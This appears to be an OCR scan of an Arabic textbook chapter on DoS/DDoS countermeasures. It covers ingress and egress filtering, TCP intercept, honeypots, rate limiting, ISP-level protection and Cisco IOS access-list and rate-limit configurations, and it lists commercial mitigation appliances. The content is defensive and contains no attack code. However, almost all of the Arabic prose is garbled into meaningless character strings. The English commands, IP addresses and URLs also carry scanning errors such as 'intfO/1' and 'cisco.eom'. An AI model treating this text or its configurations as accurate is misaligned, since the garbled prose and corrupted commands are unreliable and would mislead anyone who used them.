jIxjojI jjiiij ^ij ^ill CjS jll J .^jI^jjuj Jc iaia ^jjjc jjoJI ^!>L<ixi3 ^-UijaJI jW^-j £y* i^A j .^^ji ^ ^l.^lmV lia j 

LdJ jj 6 6j±laaJl JJJ-<J1 A^j^kJ Aijstxi jj£I I jSkJj^J ^jl CljjljVl Jj cJ J^ U^ 3 ^ Ud 1 ^^ ^ a\\ Ajiji\jl\ UL^jJall jj^J tdiUi^Jl 

.^jjjjJ ^ j^A J A£jLauJ! ^a^C ^jUijJa] JjJaal cJ-^H (^-^ 

"DoS/DDoS Countermeasures: Detect and Neutralize Handler" 0.0^^ 1 JU^I 

jj ^Iaj) .cIjUl^JI ^.aJ qia^I^aII ^Uajai j ^a Jll j < "Handler" ^ j l^j^ 3 j u^j^ r* 

(jjialU t^lli ^jj ^jl (j^jj j^J^ ^-^-^ 3JUi j ajujjuj <1loj j jA "Handler" ^^1 
a£jjoJ! Ssc aja^ lI^-^ l>° j^^j * jl £.!>Ia3lI!j CjL^JIx-aII ^jjj jjj>J1 ^^>^- JaL^lj Jlj^iVl cIjV j^ j^j^ ^jujIj^ 

^jjaj J^Uj '"agent" ^ <jjlaJU j^ill "DoS handler" c> s ^ 

t^a j^-!i ^7*1 (g a\\ ja j^. (jjK ujj jll ^ n ^il ^j! Aid /oAjlill ^LqjAc ^!>l£ jll ajAxJI <J*^ (jSxxll (j-a CjLaJLuo 

.DDoS ul^ ^lJ AJUi 



^ https://www.facebook.com/tibea2004 
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- M DoS/DDoS Countermeasures: Detect potential attacks" cjU^II uLZj&\ 

'engress filtering 'ingress filtering : JVI lDU <> jj^ 'W^-M & <^'j lU^JI o*j± £±* J < 

TCP interceptj 
Ingress filtering *k 

c> '(IP addresses) prefixes c> ^*^l cjU > ^jal l cjU^a AjL^JI jSjj V "ingress filtering 1 Jj^ll 4_ii^aj 

"ingress filtering rules" Jj^l jj ^IjS ^.iki V Jll S jj>«il j^^l o^j^ ^I ^Lu> Ij ^ j^a (j^ ^ ^tg-^l '^i 

jjj^JI a£^>^ (J^nlaj t . 46^Axl<Jl l-l^aII CIASliA Jl j>Jl <Jjoi^<JI clAj^lc] ^l<l^jj (ISP) (> — ^J-"j J* ^j^. ^ 

t^qj'q^ll j^j^a^ll ^juUxJI 4Jl j& aAA S^ilall S^)^ .4 » ^ jLk (j* ^L>il3l jjjaII (j* ^ 

_<c.j^)juLd (J ^11 (j£-ajj ^JL^ ^j>1jl^q (jl ~l "I ^Ij^j 

Engress filtering *k 

^^^1 j J V-aai ^ a£j^JI A jz jll "IP packet headers" IP ? jjj ' jj^l t> m j^Vl liA J 

djLij jll "sub-network" a^jJJI ^ jLk ^ jjjI*.a3I ^^Jj jll .kaa ^ _pJI .3 m ^ j^^-*-* C5 Jj li] La Ai^xJ 

(jl jjc JiLdj (jl (Jjjj^ ^ J a ^ i^LuiaSI j v ^ (jjjUc uj-^ uW J ala I c^IUa .IgJt mjl ajj V jjI*.a3I ^SlI ^3 Jll ^ 
^jAxJI JaL^j ^jj i o IP u^j^ c ' f ■^* t> «* La Ullc. JiHj DDoS ^ * vw 4_jc^)i3! 4<^.*U ^3U^ ^ i^Lola] jAj^xJI 

^jjj ^a jj^>-a ^^>^- l$\ A_iflj^ali3 Ajc^)i3l a£jjuo3I AjLg^J! a^ajuaI) (J jjjoi-g ^la lil tojj^JI IP ^jjjUc ^ (j^j^ cl)^ 

'underground hacker jSII J J^a ze ro day attack JjS ^> ^j^ll l^jII ^Lk jl£ lil 

;^j^pJl <jL ^'^ ^aJ iij ;<il3i ^pa^x-a V ^a^L^Jl (jj^J (jl CjL^ia - alii ^nlaJ jl (^5^ 

CjV j^^H (j-a ^jAslSI A-Jlxi £yz (jl Ljajl AjLoi (j-a li^ j .a^I ^ a\\ ^JIj^jI (JjjJjojUI ^^LiJl <J jj3 ^a^C Jj3 (jxi oilajl (j^-aJ ^Uaill *La!>ljaj 

(j^ Uui tia^a <JjHa>Jl 6j^U^3l JJJ-<J! (jia^>xj3l ^uaj ^^)ia (jc tilli ^jjj^J (j£^Jj _4juLja3l "exploit" J^^l <^^kioui]| 

TCP intercept i- 

(> ja j .TCP SYN-flooding (> TCP j^j^ j jj^ 1 ^ yr* TCP intercept 

<Lla jj^ ojjU^ ^ CjVI^jVI CjUIL ^ JjU ^£ Jjujjj ^l^II 'TCP SYN-flooding ? ^ 

4^. CjVL^jVI (j* lS^W^ 1^ .cJ^ uj^ J lS^^I c^^^ ^ jll <Lla ^u>n\ (jjjUsLSI (jl La£ j ,<J jll 

V ^ (jjJC jJJl (j^^klauJl (jli ttillil j .^LaJL^all CjUlkll C5 Ja» 3_A^kJl jl^jj ^ t . UjujJJ j) (j^-aJj ^a^liJl cJ^^ (j -0 

I^J .l^>^. j tdjliLJI Jij <J j£ jj *Ld^k ^I^jjojL jjj^IVI ^^>JI cJ jll tdijjljyi a£jjou ^JU^jVI (^^ic (jjj^li I jjj^j 

TCP intercept * > 

J jj^s j <^la ^ l ^gj l kL ^ jij ^jj (jxi j ^LJI Jl ^XixJI JjS (jxi <Luj j^ll SYN f» lP 3 j^^ 'TCP intercept jJI J 
.JjxaJI ^ Jl^ajl ^LijL ^ajij jJI (jla 6<^j3l ^ai_k t^lkill jjiixJI ^5 lil "extended access list" 

£A ^ - ^ J ^cxilj^)i3l ^j^J 4L_L^ai3l CjVL^aj! (JjjJjojIj ^aJJ 1 a j .(JjIaslI! (jc ^jLij 4-$-^- jJl ^ (jL^ajL \ - taj| ^j^J ^<ilj^)i3l * $ J uj a 

TCP intercept .^UJI Jj^jll c> 44x^1 JU^jVI CjVjU^ TCP intercept ui^ 'l^j 

,(JU^jVI ^L^jl J lS^*-^ j ^a^^JI (j^ JajjL*i j£ 

M DoS/DDoS Countermeasures: Deflect Attacks" <^U>$Jt cjjI^j 

^ajflj L_fl jjoj (^AAaU L_J jUa^ll li^ j .honeypOtS (3^^ (jj^>^ (S ^ pl^)C-J <jllaJ (jj^J (jl (j£-aJj tiaaa L>^^ W^ 1 ^ ^ »aJajVI 

l^iilj ^(j^l^l (j* -kiaa Jxill ^aU^I ajU^j ^ajii V Honeypots .c>^ uj^ J*^^ ^U^illj 'honeypots ^^W^? oh^W^' 

^a^J ^iLd liAj .^llajudjl ( ■ lajul 1 g ^ iklLujI (j^-aJ J^lj (-1^-^ (J CjLd jIslaII (jj^^J (JiLk (j-a ^ 9jjaJ (JjLaJ La (J (Jjj^alilill ^jjj Lxiajl 

.CjIa^JI oi^ J 4^^jjoia3I CjIj^VIj iiLic> ^a j^-il Jj^-^ J^l iL<l^JI g^l jjL <alxl<JI CjUi jIslxJI 
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.^^IaslSI j t^jjJI 6l_ijj3! ^1 ja. iiUi Laj a£jJo3I lA^Jij (j^j honeypots ^j^-j^ ^-^u^' cs-*^ L — 1 j 2 ^! c Lu^j 

j' "handler" glU^JI cjjjSj gr^W* honeypots ^ .ol^ u^-W^ t> (J^aVI t j .. ^ c*Ui ^jjj 

tsliu Aijjiall £>^a ^cIgj ttilli AiLjaVUj .l^il jlkl ^jj ^ ajc jj^JI ^hill liA j .honeypot cJ^^ "agent" jll ^ jSl 
cijU^a ^1 .ua ^laJ3 l^l^kiaal ji-oj ia^xJI dIaj ."agent" JaL^j jl/j "handler" ^Jl*-*!! laliSaOU ^i^j 

ihoneypots <> fl< ^ « C^jl 
Low-interaction honeypots ■ 
High-interaction honeypots ■ 
lajlaa^ slSUua l^jli ^ j±j 6 j^j .^a^ll -S^t Honeynets .Honeynets High-interaction honeypots ^ 

ClAiLilaj Jijoij 4jqjq^l jj jjja^ 4£f^ <^-A J t^jj^^l g ^l^kJ AjcI^JI (illjjuJl 4£jjuJI £>1a j 4 j-iunVl 

KFSensor i- 

http://www.keyfocus.net 

(JaslSI J^Lk .ft^ljjia 4_L^a^Jj ^tiiajJall ^Uail! CjUi^k (j^^A 3 (j^ (jl^J^llj ^jjlLuiL&ll c &ju£j c_J^J ft \y >■> a 4_jHaJ KFSenSOr 

j^ll ^ KFSensor t> ^ j^fel j >^ j jla^JI j 








KFSensor Prolessioaal - Evaluation Trial 
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M DoS/DDoS Countermeasures: Mitigate attacks" ^U^S) 

ifAj D0S/DD0S t-fl^J ^JJ U^Lk ^Ij (Jjiall (j^J^ 

"balance load" J*aJt ^jtj^ 

c_jUi3l ^ ^ j^jfc <!U. ^ jjII (jlkjll ^ jc^ ft^Uj "bandwidth" <^^^ j^^ (jUajll c>a 

^IjaJ! . jLU^ll ^ ^klau jl "replicated server model" ^^^^ tl£^j .^^^ c> j^'/^j^ 
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"Throttling" ± 

sj^J jSaj AijjUl ^ .JiJ c_jUill <> ^Ij^JI ^lJ l^l^ikU (jlaj Min-max fair server-centric router throttles 

4^^. ^ iklLuJJ (jl Uiajl (j£-GJj .l$JL-a <J-gIxj3I Jc Ij^lfl ^alLJl CS"^J A V° *^ *^J^ JJ^>^ ^^P" ^J^j L>^ J^J^^ 

jll DDoS P JJ^)^ ^^)^ C^^^ ^a^JjauJl JJ^>^l 

as aS\ j& l_j jLojVI Iaa ^ 4-i>.>uj^)3I ^ jjll! (jli ^Ulk^l! ^ g J >* a djLi^j Aili cjI^jjoJI Jxjuu*j 4_ijj^)^j3I 4_L^.^<JI J l_j jLaiVl li& <jl ^c. j 

jjoJI Jj^Jl (J^H -^^jj-J ^J^J cJ^> J (j^ a JJJ - *^ ^^>^ ^-^■nj ^ t^jLi^VI (J^aau J .4_jil£3l CjljlijVI Jl C5^J^ 



"Post-Attack Forensics" <^^l ^ 
J _^Uai31 li& J ^y^i UJ^J^ (j I ^— ^ tA£jjoJl jl j!i jjj^I j^-^- ^aLu&VI (j-a j^-*^ £^ i30^ uW^*^ o^*^ J 

.(Jjjj^ CA galkjl] ^ g II Asu ^^C^jjuol! t . Jail L_J jLoil ^1 laJL ul e^y^ clA^ tdjVl^ll (Jl* 

^)jjjA a J>(^ JJ^JI -ia^jl JjUl (j^-dJ .^a J^g^ 6^Lja-<Jl j^Ia^I jj^xj] ^Lja-<Jl JjLlikVI J J-*^ ^ jl J-Q Wl J AiLa djUUJl 

_l^jl£jjuj Jl ^ j^kJl jl (J ^^a3! £y± (JjJJ^ ^a JJ^>^ ^-^)^ ^ill dAjA^JI ^Jjuj^ill C-A-jjjj ^jJ^lall A£jjua3l ^jjjaixi oAcLoixi Ljajl 

j-d ^1 a J§V (JJJJ^ ^ - ^J^^l ^IA^JjujI A j£ <Lj V ^Ig-xJl ^jl ^j-d l£ul] <£jjuoll ^Jjjjabd AC-LolJ ^jl (j^AJ (JJJJ^ JJ^>^ ^^>^ ^ ^ (Jjl^J 

^Ia^I^xJI ^jl Cf"^* ■U JJ J^ JJ^) -0 ^^)^ J V AjAaal IDS L — J -^-? uaJ J ^ J^^J 6 ^HJ^^ jW^ 1 (Jj^*^ .iS^)^ 

m 'e>\^A\ clA^ ^ uj^^^ ^Vl^ j j ^ laj > n jll diijiiVl djUiAk c _^Aixi SAcLai* traceback IP t^i^l j j ^> u^j^* 

Run the Zombie Zapper Tool ^ 

^ ^^jl -ia^V (cJi^l ^ q> f ^ ^^j) IDS j 'L^y djL^jfc Iajj ^\ (j*] ^jUijJa C5 lc Sj^ta jjc. Ldik. 
(jljc-Vl ^Uaill jl Zombie Zapper lS^-^ AiA^lauJI ^u^jjall 6<!LaJI ^ ,<Lal^ a a K ^ ^ll j jj^^l 

<^ Zapper Tool lU^ . Jj^j J^^^ j 'uAh ^ j .Zombie Zapper c> 

Stacheldrahtj 'Shaft <TFN 'Trinoo ±± ^ 



M DoS/DDoS Countermeasures" lhj^ ^ SjI^aJI jjjIUJI 



."broadband technology" (jUaill U^jljj^i ^ ^ £^ *^Ui3l Cjli ^i^ull CjUII 

.multi-hop WMN -S <^3U Uu^ V '"routing protocol" ^^jtjjt 

."reflection servers" (JjjI^juI a-^a^ ialid ^ <*iI31 *^jl jll ^j^JI ^ 

.jl^j^aj dj^V Jjj^ll ^n^i 
.ISP l9 J^- ^^^^ ol?^ ^>J^ - 
^1 jjl ^al^j j ^j^ill 'a^A\jlA "physical layer" '^A^\ aLUI J "cognitive radios" ^> J\ * ^ j 

.cjUl^JI 

.a^jUJI Internet Control Message Protocol (ICMP) jj^ J^»j lP^ J - 

.^1 ^strcpy 'gets ^jj>^ j^l c^Uajll ^l^ki^l ^ - 
.(JL^ajVI jLii^lj axj qc- ojl^VI 
."Prevent the return addresses from being overwritten" £WuV> ojj^^ 

£ a\\ JjS \ ft'^W t ^ ^aJJ ^31 diljUJl L_fl3 jli (jl ( . la>J 
.Cj!^^ AaII A a ua ^jc. (J>»Ujj (jja^J ^l^)^-] 
_^^J| ^ cJ-*^*^ cJ^^I UJ"^ ^f^ 1 A^UaJ ^1 laJLujI tjUlUj .^a^aJl J AjI jJ A^JjuJI <aUaJ 
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DoS/DDoS Protection at the ISP Level 

http : //www . cert . or g : j^-a^ll 
<LLouj ISPs 

JjS ^> ajlajI* ^l^j V dir^j "in-the-cloud DDoS protection" ^ jSjVI Cj^aj 4jU*J ^j^ 4_jU^ ^is ciu djU^k 

^ jja (j* Ijjllnj (jl (jJ j j . u i. a 13 (j^J .l^J^lclj l^Ljj^aJ f J^-!l ISP f JJ^ S^lfirj ^jj _^ ja^-ll 

.DNS propagation ^ j^l IP J l&j "original affected IP" (J^Vl j>^*ll IP ^ c^>ji>Vl 
Bots H _ pi ^ 



(1 .OOO- ^128 kb 
IOO.OOO) * 



Internet 

Backbone 




Enabling TCP Intercept on Cisco IOS Software 



^j^il! 2^ j ^ <JU3I j*\ jVl ijajj ikJ jj TCP intercept u^3 







Command 


Purpose 




Step 1 


access-list access-list-number {deny 1 
permit} tcp any destination 
destination-wildcard 


Defines an IP extended access 
list 






Step 2 


ip tcp intercept list access-list- 
n umber 


Enables TCP Intercept. 



io^Ij&I aj^Ij! "access list" Jj^jli 3^15 

Sj^q cjKjui ^ 4_*iI3l tilt laaa (j^ljjc-l .2 

a ^ la o ^1 jail j-<JI tilt Laa (jlaljlicl .3 

(jjjj <j| U£ .ft^^ft fi\ ja. ji djlif^ "destination" ^ jll j "source" j^^Jl J j^a jJI s^lc j 
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g-iLJI s^aIAJI jj "active intercept mode" j^VI ^ j ^jj*^ j J**j J ^j^j TCP intercept 

f Cisco IOS Software j^i^ ^W^k 4^^ VI .^Ijj^VI ja ^.JaljjaVI ."passive watch mode" 

ACK of the SYN ^ 4 ACK and SYN * ^Lkll <> ^ ^V^ 1 J^J <(SYN) fcjljll JL^iVI c^UL ^ 
jj^^j _^LJI (^luaVI SYN ci^J^ 3 ^^Jl ajj^SII AaiL^a^ll iiii ^LjjJI jli 4 Jja»JI ACK . Jj-uJ! ^ 

."two-half connections" u^VI CjVL^jI iaj <$jS5151I <aiL^l l JLu£l 
:^VL£ ^1*11 ojj^ J TCP intercept mode t^j -W^ j-Vl 




Command 



ip tcp intercept mode {intercept | 
watch } 



purpose 
Set the TCP intercept mode 




'Mitigating DoS" lhj^ *L 



Mitigating DoS using Access Control Lists (ACL) 
.djUjiVl a jW^ <J^ c> <ft <4j yr^ ^IjSII c> a^j*^ ^ "Access Control Lists" Jj^jll J <a£a^ll <ajlj3 

^ j*a^ L_flii j Jaj ^ "CisCO rOUters" J^H J J^ 3 J^ J ^aaal ! <ajl j3 (JjflaJ £ jjAall liA t-a^Jj 

.4 ill lilti £j^ j (J^.ta Jjj*^ jKj" 1 * W^' La£ 4^juill AjLaaJI 3_Aj\ill f>i& ja jj* TP ^ 

LoAic _ J ja.^1 ACL J lil jll XP ^ o-* 3 ^ 6 j'j^' ls^- ACL Jjjj^ LaAk. & JLl<JI J^f^ 
.l^jj jl jl^j ^11 reject j> accept 'deny <aliLx» cj! jba. jli * jjjI jll jl^ ^ ^j^jJI s^Ull ^ jaJI 

j-a .JjAslII JJ^-la J .A^JjaJl (j-a jjj!>Lall <jJajC j& ^a jjJl Cl3jl£U (_£j£ill J ja*-1I <jl 4,jLuiJ j tiLjl 4 joiajJl 4 j-nnl jJ IEEE^ 1 ^^ Lifl J 
4^juill pbl JJ^^J c5^JJ Lax t^U^ ^ ACL J ^ C5^^ '^J ACL ^1 j c flxjJall Jataj 

jIaj "ACL compressor" yr*J ^Lua!)U S % j^a ^ Liajl d^JI 11a ^JUj .I^jIc S jia^l < jt > ^1 1 ^ Jx^j ^UlUj 

^cjtlJl ^Jajj _4_i±j^)^j3l 4.1a ^Jajl L— La ill ( . lla ,CjWa3I (Jj^ ^jjj Jl jj V C5^^J ACL (Jj^^ ^ a cl>^ 

Aclja ^^kludj j^J t^jjJixJI 11a ^ .ACL compressor ^ h^'iui l lie. 4 c L^aj ^ La ACL -ja xjJ a j^j <jl <jjjj^j3I 

^Jc. <flJJJaJ ^JJ UaJ JJ j\ jll jxil jVI jia^J ^^-^-^ J <^ J^l^ 6 ^ cJ^-^j ^JJ J>(^11 j-a JJJ^ll ^J^- t — *S j A-JUll ACL 

m jj jljll I>ja j-<i ja5 *^jl jll jjj^ll ^j^- lS^ 

Acc^ fer 1 192.168.2.2 

Interface fO/1 

ip access-group 1 in 

"Access list" *LSjI ^jj 4 j^l jVl j t> J UI -J^ 1 J^jU J^J^ "Conft" J jVl j*Vl ^ 

B lAiaUx j-d ^^ic l^jjjiaJ j 4 jjstxi jj jlj jl ^1 jj^ jll ^j| j3 ^j-d AjAslII ^Laul 1 1j£ ^J , 1 jA LiA j b,JC jj^ jll <Lajla ^.Uacl ^aJJ La£ 

j^Vl Llqa^LJ ajjI^jII Uaj^ .^j^UI cj! jjjijll JLk^jj JLk^V "Interface fO/1" j*Vl ^ 4dJLl3l jkJI ^ 

jljixJI ^ ip ^ ja. ^.lA^ Jalijajl ^jj cliia. FO/1 ^y^J^ ( ijj^n ^jij UjI Iaa ^^j^ 4 M jp access-group 1 in" 

.l^LULiI ^jj 192.168.2.0 c> u^^^ 5^ i> IP e> ^ * J^V 1 ^ .192.168.2.2 

jlaa. ^aJJ -C5 joijIjI ^a^La. ^1 <Jj^aJ ^a J^-ll A^Jjai Jjj* ^J^- C^l (j^ Oj^ 1 ^^ ACL J^ QJ« ^ '^ XJ ^ clA^ 

ACL J^ J U^^J c fljiaall b jlaaJl oAA cJ^'J J .4-^J <Jaij^3 jj^ jll laJ > oJ V o^Uacj ^aJJj LdLdJ 192.168.2.0 ^ J>^^ a£jjoi 

Cjia jj* jj^y^\ ^^>^- c l£^>^ JJ^>^^ ^^>^ L - J ^ j-^ j ^jL^j^j cl)^ ^Lijll <_£jj (jl ^Lua!>11 jjj-<JI j .Iaa ^ 

.ACL (i^j axj jjill 

Sac-Is ^1 J jj^a jll jjj^ta jjA 192.168.2.0 cl^ uj^ l$\ <j!VI ^ ^m^j 6Aa.lj Sjiij ^IUa jSIj 

^ 192.168.2.4 j 192.168.2.3 J ^ 192.168.2.2 jA ,>i3l ^jLj^VI L% ^ jll cAjLJI 

Jj^a ^IjILj .Aa>l g all 4_liijC. •Jj^a j* VAj ALala <aJjudl <-<iAaJl ^liu ^jSj I1a ACL r* J^* C5^^^J .^'■^-^ J JL^jVI ^jja>tjaJ (jJJC jjuj 
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.^aIaJIj (JL^jV! lj*-llalujJ V L- a jjuj Uiajl CjI^JjoJI £>A& ^jjA ja. jaII (jjJC jjoJI ^^Iasl!! 4 jAjj Lq (^C-J .^IaJI <aila»xJl 



m A alia &1I CjI^jjoJI CjLo^JI jjoilii L»Ajc jj^xiill ^-llaj t-^jj tUllld ^la. (Jj^j (jl Iaa (jli ^tllLj 

Mitigation using Rate limiting 

a!\A UUi J^j V "Rate limiting" ^11 '"Access Control Lists" Jj^jll ^ ^1 j3 ^ 

<L^)]a3l £>A& CjA^JcI ja* gall ^^Ic J^tS ^LJl (jj^J <»-fl JjuJ <^Hj JJJ-*H ^^>^ ^ ^ J^u> lAa. jl < aa..< £jJaj tdli (j-<* VAj .A-iajJall 

^j-Lcj V Ia& (j£l j .<L<iAaj| (j-a ^jIaII (jLa^aJI (j* a£jjoJI CjU ^^ij j tAjliil <Ulxi <jj£j (jl (j&^j <jV CjULjII ^^aLg th» ^ <Jja (j* 

Cjl a-\q\\ ASlAjI JJ^a 4-^^)^> (j* ^JWI ^1 jVI .tilli^ g a\\ ^aUaj <Jj3 (j* JJJ-^H ^^>^ A^aolLj (Jl jj V LJlia (JJ^J (jl 

<Ja.b ^IjAJ ^^1 JJ^H ^^>^> ^ fcJ - a ^ CS-^ A^JjaJl <J jjjoui (jl 4 J Vffll £>AgJ (JjJaSl .(j;i*-a (.£ jlLoua ^1 192.168.2.0 

AaJl (JAx^q j^ > nj > n (3flaJ .^LaJtx-aJl ojA9j ^LaJl IfrLaaJJ (jl (j^-oJ ^^jll Jj^all t^jjuall aa a (^^Ic AxUXJ Ia& JJJ-all (J-JJt-x» .A^Jjuall 

<j£^ Distributed Committed Access rate (DCAR) j Committed Access Rate (CAR) ^ ^ t> 

^AaJLaball ^y*\ jVI (j-a AjjojLojVI > *all (j* (j^l fc^UA .4 \^ ^ ^-^-1 J ^ 6J^U-all i _ 5 -i^ jl *^jl jll JJ^ll ^^>^ (^-^ -^1 (J-J^ ^1 

CjIjIjsII iUJl (ji*j -oli s^olS jjU-^ J IP # ."exceed action" j "conform action" yr*j 
(j£-<ua AaJI Ac I (jjflaj ^j^ajj drop ^continue 'allow 'deny ^^Jl ciiUlkioJ taaj cjljljlll < allkj _til3i ^^Jc <aSi^xJI 
U^*^ "show int rate-limit" j*Vl . >»ljVl <^lj ^ >»ljVl ^Ia^U c^j ^ ^ (^L^ill ^ J U^l 

.AaJt Jas-a jV ^LuiLuiVl ^iiJl Ul (jjlJJ /iiij.n (> JU1I ^jUjS) ^ojjII .<LILJI 5^1 jll cilli l^iifSaJ ^jII CAR J^>^ 

,4jj*-ft j (j^a CAR 4joj^ 3JI jl jl (jjiKM "no rate limit" jl "Rate limit" \ v^^j ^U^l J£jjJI (j^ U£ 

dAA ^ UAjc .SjjL-all jl *^jl jll Jj>oJl <^ ^ cj^alSI lWI ^1 ^ "output" J "input" ^JjaLiJ j]| CjUI^II 

IHaj ."access group" ^J^l ^Ia^I <"pre-configured access list" ^I^VI <^IS ^ s^clSlI 

jjA-g <Jj3 (jxi Jj^ll jAx-d AjAaJ (j-^-oj ."ACL index" ^*^l •-^11 jAx-d ^ -U^lun (jl (j-V^j ^(^Jall (jjoii j Ajj^-SI AjA^jI 

£AAa^a ( i a!£ "Burst maximum" j "Burst normal" .4 j ^IMI caj jIaLoj j>»VI Iaa < . ul a i oaja^j (j£-ojj a£jjuo!I 
(J^lault ^jj c aj£ "action" ^Kll (jli 4 6!>lcl j£i Lo£ j . Jl jl!l Jc ^j^ll (j-« j-ftlu^ ^AlSI Jc ialLaJI j jj^ll a£j^ cjUISj 

A m ^ <^.l j J ^Ld^Jl 

(j^ Uo jjlil li^lk ,AaJl ^jAsLxi j-dl jl I^Ia^JjojI (j^J ^11 ^istxi J£ 4 qjh j c *<1>^i1 ^11 j£jaiJjaj ^ j^ (j-d (^1^11 lS^^II (J JJ^^ll ^aAJ 

J CjI^ jll (j^» AjAxII jl 6Aa.l j 4j^jI Jc AiifSaJ (j£<u AaJl Jaslxj .^jUjuall j SjbVI J J^Vl J^ AaJI Jasl-g (oAflauoJl ^laAll CjUII 

oAkxlt <£aj^1I 



input 


Applies this CAR traffic policy to packets received on this input interface. 


output 


Applies this CAR traffic policy to packets sent on this output interface. 


dscp 


[Optional) Allows the rate limit to be applied to any packet matching a specified differentiated 
services code point (DSCP). 




(Optional) The DSCP number; values are 0 to 63. 


access -group 


(Optional) Applies this CAR traffic policy to the specified access list. 


rate-limit 


(Optional) The access list is a rate-limit access list. 




(Optional) Access list number. 




Average rate, in bits per second (bps). The value must be in increments of S kbps. 


burst-normal 


Normal burst size, in bytes. The minimum value is bps divided by 2000. 


burst-max 


Excess burst size, in bytes. 


conform -action conform- 
actiort 


Action to take on packets that conform to the specified rate limit. Specify one of the following 
keywords: 

continue — Evaluates the next rate-limit command, 
drop — Drops the packet. 

s et-d s cp-conti n u e — Sets the differentiated services code point (DSCP) (0 to 63) and 
evaluates the next rate-limit command. 

set-dscp-transmit — Sends the DSCP and transmits the packet. 

set-mpls-exp-continue — Sets the MPLS experimental bits (0 to 7) and evaluates the next 
rate-limit command. 

set-mpls-exp-transmit — Sets the MPLS experimental bits (0 to 7) and sends the packet. 

set-prec-continue — Sets the IP precedence (0 to 7) and evaluates the next rate-limit 
command. 



http://www.cisco.eom/c/en/us/td/docs/ios/12 2/qos/command/reference/fqos r/qrf cmd8.html : j^-a^ll 
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."ijq'n aJJ 4 > >n > >1 (Jjfl ^ja all d^Ic^I J-aljVI (J^& 4-9j*-all aI^^JjojLj 

rate-limit input 8000 2000 4000 conform-action transmit exceed-action drop 

FO/1 J) J J^"^ ^ ^ .(J J^ J^ J* (J^f^ '^ c * 4_x»l,l^Jjull ^aJ ^I^Vl £J^a jl J-^jljH ( ; ^Vj JjVl J-*VI 

La£ jjj^ -J ajuj j^ ^—^j*-^ ^3 ^ qVi^ a\\ djl^jjoJI ^j-<i j\\ jjj-<J1 4^j^> J^ L - c . 1 >j ^ intfO/1 ,>*VI ^al^vimlj 

liA J ^^klaiJI ^Lk Jj£ <> ^ j A^l^l J clu 8000 

W j^ jo^ fc* ijuJJS\ jj>« ja c^ill j CjjU 4000 burst maximum ^ ^.j^ f% .f j**^ 8500bps 

,4_jiiL<Jl ialLajj ^jjj £>i& A£jjoJ| Jj^a 4-^J^> (J^j ^ ■ t — ^J-^j 

192.168.2.2 < jj^l tiA J .^SU t*BiS j ^AajjJI Jtkill o^j^ jA* 5 J <-M uj^ u' ^ ^ .cSj^Vl 

.192.168.3.0 



Combining Rate limit and Access Control features 

^^lll CIjV jJ J^>J^ (j-Q fi^J^. <c ^ Jj£jaLi3 <Ja*-<J! Aa. j <J jj^ jib ^aall ^jI j3 £a^13 ^a^L* LiA jjjouJI JJ^>^ ^^>^ 
^jJal jll 4<J£joJ! li^ ,*L<»^JI ^j-d (jLa^pJ! 4jjL^<J jJjllLoj J£ (Jjxjoij ^5-!^^ <J£juo3I t *° - ,(JjJaal cJ^*^ JJJ - ^^ ^^>^ (3^^ 

^ ^ill ^ jll ^i^J! t^lSjill ^ ^ u^J! c> .192.168.3.0 192.168.2.0 492.168.1.0 ^ ci3U J 

.192.168.2.1 j* fteJ! 

<JUi ^1 jll ^ <Ljia3l . j^jolloj jjll ^ "ACL rules" ^ ^ j?^^ ^ ^^i^JI JjVl <Ljla3l 
^ 192.168.2.3 j 192.168.2.2 j^VI < ku^lt jl ^ J -uli tcilli ^ j .J^IHIj 4^1^ <> cJia jj l^V 

/ alia CjI^jjuoII ^^j^j^II jjoilii Cliia 4x. j^ll U^J^ 

<J ^Ja^xi ^ CjI^JjuoII ^-Ia^J (iljjjLa ^A^a (j^flaJ ^aJJ ^j£l! (J^*-a ^lllaJ I^jS ^aJ 4il J^l^ J^juoII l^jJajJ c _^j3Ij 4_ijlil3l <aj^JaJl 

^a Jlxi ^^jJaUJl CjVI^JI dljl£ ,Cjl£jjaill Jc Uiajl (3flaJ (j^lj 4 ijt ^ <£jjai ^j-d JJ^l^ ^^>^ L - J^l^ I^A . JJjl^)li 

4jLa^. Ajjilll oi^J (j^j JUlUj jl jjJaV A^fuJI dbJa^su JUlUj a^I^aII j^a^j ^alc Jc ^1 L ^&\j Burma DDoS 

,Ljaj| (JJJC JjuJI ^^IaslII J j*l^<i cJ J ^-^jj PDoS l— ib&^J A-iajJa l^j j£ ^j-d 
^aJl C1jL^ij-<JI j J jj^a jll ^aall J£ ^ahViml ^aJJ liA . JjJail ^lij <A\ ^-UacV <LLuJ! djUjiill ^ £^0* <— lSIUS^ ^Lul! ^ajajjll 

_(Jjj^ajll 




APPLYING ACCESS 
CONTROT LIST 



^C'L applied on the attacking 
network 19^.1<SS.^.O 




192.168.2.1 fATTACKER) 
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l_ SI> O K,\ l t LIMIT 



Limit applies! on all the 
networks including legitimate 





1P2,X6S.2.1 ('ATTACKER) 

191,165 (Legitimate) 





I92.16S.3.1 (Legitimate) 
19:163,3.: a^gitimBte) 
192,168.3.3 (Legitimate)] 



COMBITSTNG AOL 
& RATE LIRDT 



192.168.1h1 (Legitimate! 
192. 16 S I, 2 (Legitimate) 
192.168.1,3 ae&itimite)l 




access-list 1 permit 192.168.2.1 
intfO/1 

ip access-group 1 in 
intfO/1 

rate-limit input access-group 1 8000 2000 4000 conform-action transmit exceed-action drop 

access-list extended Client2Server 
permit ip host 192.168.2.1 host 10.0.0.1 
class-map match-any Client2Server 
match access-group name Client2Server 
policy-map CAR 
class Client2Server 

police 8000 4000 2000 conform-action transmit exceed-action drop! 



yi https://www.facebook.com/tibea2004 



1161 



interface F astEthernetO/1 
service-policy input CAR 

fj* > ^ J^h Policy map j Class map ajj^JI cj! JjJ! jjjSI ljjL&I li* ^-^j 

CjIj CjIjI jail iLaj) j A-ia. jj3I fjA Jl^c-Vl Jj3 Lu> 




http://www. cisco.com 



FortiDDoS-300A J- 

http ://www . f ortinet . com : ja^JI 

DDoS j ^^UaWtfl ^ j j^V! ^1 j ^ ciLLo^ FortiDDoS 300A J jt 

s j^ll l^J .rate limiting j traffic profiling j ^ ^ j*4jj .o^ u' uj^ Sjo ^j^^jfe 

DDoS Protector ^ 

http : //www . checkpoint . com : j^iJI 
DDOS application layer attacksj network flood ±± <jU^JI DDoS Protector 

Cisco Guard XT 5650 J- 

http://www.cisco.com : j^iJI 

lU^ ijiiL ^jL . ^ "DDoS Mitigation Appliance" o*j± ( % j^J j& Cisco Guard XT 

